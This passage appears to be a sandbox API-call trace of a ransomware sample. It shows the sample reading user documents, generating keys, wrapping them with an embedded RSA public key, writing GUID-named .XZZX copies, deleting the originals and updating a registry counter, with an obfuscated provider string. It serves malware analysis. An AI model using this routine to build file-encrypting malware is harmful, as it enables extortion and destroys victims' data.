hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0043.720] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0043.720] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\xlbxUnchVTGwsFtof.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\xlbxunchvtgwsftof.doc")) returned 1 [0043.721] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\xlbxUnchVTGwsFtof.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\xlbxunchvtgwsftof.doc")) returned 0 Thread: id = 149 os_tid = 0x8e0 [0043.761] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.761] lstrcpyW (in: lpString1=0x417f460, lpString2="ZN_ n.ots" | out: lpString1="ZN_ n.ots") returned="ZN_ n.ots" [0043.761] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.761] SetErrorMode (uMode=0x1) returned 0x1 [0043.761] lstrcpyW (in: lpString1=0x417f860, lpString2="ZN_ n.ots" | out: lpString1="ZN_ n.ots") returned="ZN_ n.ots" [0043.761] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x2f37324a, Data2=0x18a1, Data3=0x445d, Data4=([0]=0xa1, [1]=0xce, [2]=0x14, [3]=0xf5, [4]=0xbc, [5]=0xd5, [6]=0x75, [7]=0xb1))) returned 0x0 [0043.761] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\ZN_ n.ots") returned 90 [0043.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0043.761] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned 118 [0043.761] StrStrW (lpFirst="ZN_ n.ots", lpSrch="XZZX") returned 0x0 [0043.761] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\ZN_ n.ots", dwFileAttributes=0x20) returned 1 [0043.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\ZN_ n.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\zn_ n.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0043.762] ReadFile (in: hFile=0x4e8, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0xced5, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0xced5, lpOverlapped=0x0) returned 1 [0043.762] CloseHandle (hObject=0x4e8) returned 1 [0043.762] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0043.763] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0043.763] SetErrorMode (uMode=0x1) returned 0x1 [0043.763] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0043.763] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d50f8) returned 1 [0043.766] CryptGenKey (in: hProv=0x42d50f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5a50) returned 1 [0043.874] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.874] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0043.874] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.875] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0043.875] CryptDestroyKey (hKey=0x42e5a50) returned 1 [0043.875] CryptReleaseContext (hProv=0x42d50f8, dwFlags=0x0) returned 1 [0043.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\de6d908a0693b67d2f37324a0aab9ac5.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0043.876] WriteFile (in: hFile=0x4e8, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0xced5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0xced5, lpOverlapped=0x0) returned 1 [0043.877] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xced5 [0043.877] WriteFile (in: hFile=0x4e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.877] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xceda [0043.877] WriteFile (in: hFile=0x4e8, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x12, lpOverlapped=0x0) returned 1 [0043.877] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xceec [0043.877] WriteFile (in: hFile=0x4e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.878] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xcef1 [0043.878] SetErrorMode (uMode=0x1) returned 0x1 [0043.878] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0043.878] OutputDebugStringW (lpOutputString="end") [0043.878] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.878] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0043.878] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d50f8) returned 1 [0043.879] CryptImportPublicKeyInfo (in: hCryptProv=0x42d50f8, dwCertEncodingType=0x1, pInfo=0x3e3fb10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3fb40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3fb48*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5bd0) returned 1 [0043.879] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0043.879] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0043.880] CryptEncrypt (in: hKey=0x42e5bd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0043.880] CryptEncrypt (in: hKey=0x42e5bd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5180*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5180*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0043.880] WriteFile (in: hFile=0x4e8, lpBuffer=0x42d5180*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5180*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0043.880] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0043.880] WriteFile (in: hFile=0x4e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0043.880] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0043.880] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0043.880] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4f8) returned 0x0 [0043.880] RegQueryValueExW (in: hKey=0x4f8, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x37, lpcbData=0x417dfdc*=0x4) returned 0x0 [0043.880] RegCloseKey (hKey=0x4f8) returned 0x0 [0043.881] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4f8) returned 0x0 [0043.881] RegSetValueExW (in: hKey=0x4f8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x38, cbData=0x4 | out: lpData=0x417dfec*=0x38) returned 0x0 [0043.881] RegCloseKey (hKey=0x4f8) returned 0x0 [0043.881] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.881] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0043.882] CloseHandle (hObject=0x4e8) returned 1 [0043.883] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0043.883] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0043.883] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\ZN_ n.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\zn_ n.ots")) returned 1 [0043.884] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\ZN_ n.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\zn_ n.ots")) returned 0 Thread: id = 150 os_tid = 0x928 [0043.911] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0043.911] lstrcpyW (in: lpString1=0x417f460, lpString2="zRPN8xkNuY7pBA7JA.csv" | out: lpString1="zRPN8xkNuY7pBA7JA.csv") returned="zRPN8xkNuY7pBA7JA.csv" [0043.911] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0043.911] SetErrorMode (uMode=0x1) returned 0x1 [0043.911] lstrcpyW (in: lpString1=0x417f860, lpString2="zRPN8xkNuY7pBA7JA.csv" | out: lpString1="zRPN8xkNuY7pBA7JA.csv") returned="zRPN8xkNuY7pBA7JA.csv" [0043.911] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x2ab81ee7, Data2=0x2899, Data3=0x4a2b, Data4=([0]=0xb3, [1]=0x13, [2]=0xc4, [3]=0x50, [4]=0x90, [5]=0xfe, [6]=0x81, [7]=0x2b))) returned 0x0 [0043.911] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\zRPN8xkNuY7pBA7JA.csv") returned 102 [0043.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0043.911] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned 118 [0043.911] StrStrW (lpFirst="zRPN8xkNuY7pBA7JA.csv", lpSrch="XZZX") returned 0x0 [0043.911] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\zRPN8xkNuY7pBA7JA.csv", dwFileAttributes=0x20) returned 1 [0043.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\zRPN8xkNuY7pBA7JA.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\zrpn8xknuy7pba7ja.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0043.912] ReadFile (in: hFile=0x4e4, lpBuffer=0x42dc518, nNumberOfBytesToRead=0x5a2b, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42dc518*, lpNumberOfBytesRead=0x417e418*=0x5a2b, lpOverlapped=0x0) returned 1 [0043.912] CloseHandle (hObject=0x4e4) returned 1 [0043.913] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0043.913] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0043.913] SetErrorMode (uMode=0x1) returned 0x1 [0043.913] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0043.913] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x42d5208) returned 1 [0043.916] CryptGenKey (in: hProv=0x42d5208, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5a50) returned 1 [0044.045] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.045] CryptExportKey (in: hKey=0x42e5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0044.045] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.045] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0044.046] CryptDestroyKey (hKey=0x42e5a50) returned 1 [0044.046] CryptReleaseContext (hProv=0x42d5208, dwFlags=0x0) returned 1 [0044.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\zw28zqhzfxay2nv\\4cde900f0bc30bb32ab81ee70fdaeffb.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e4 [0044.046] WriteFile (in: hFile=0x4e4, lpBuffer=0x42dc518*, nNumberOfBytesToWrite=0x5a2b, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42dc518*, lpNumberOfBytesWritten=0x417e438*=0x5a2b, lpOverlapped=0x0) returned 1 [0044.047] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a2b [0044.047] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.047] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a30 [0044.047] WriteFile (in: hFile=0x4e4, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x2a, lpOverlapped=0x0) returned 1 [0044.047] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a5a [0044.047] WriteFile (in: hFile=0x4e4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0044.047] SetFilePointer (in: hFile=0x4e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a5f [0044.047] SetErrorMode (uMode=0x1) returned 0x1 [0044.047] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0044.047] OutputDebugStringW (lpOutputString="end") [0044.048] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0044.048] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0044.048] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x42d5208) returned 1 [0044.048] CryptImportPublicKeyInfo (in: hCryptProv=0x42d5208, dwCertEncodingType=0x1, pInfo=0x3e3fbe0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3fc10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3fc18*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5c10) returned 1 [0044.048] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0044.049] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0044.049] CryptEncrypt (in: hKey=0x42e5c10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0044.049] CryptEncrypt (in: hKey=0x42e5c10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x42d5290*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x42d5290*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0044.049] WriteFile (in: hFile=0x4e4, lpBuffer=0x42d5290*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42d5290*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0044.049] 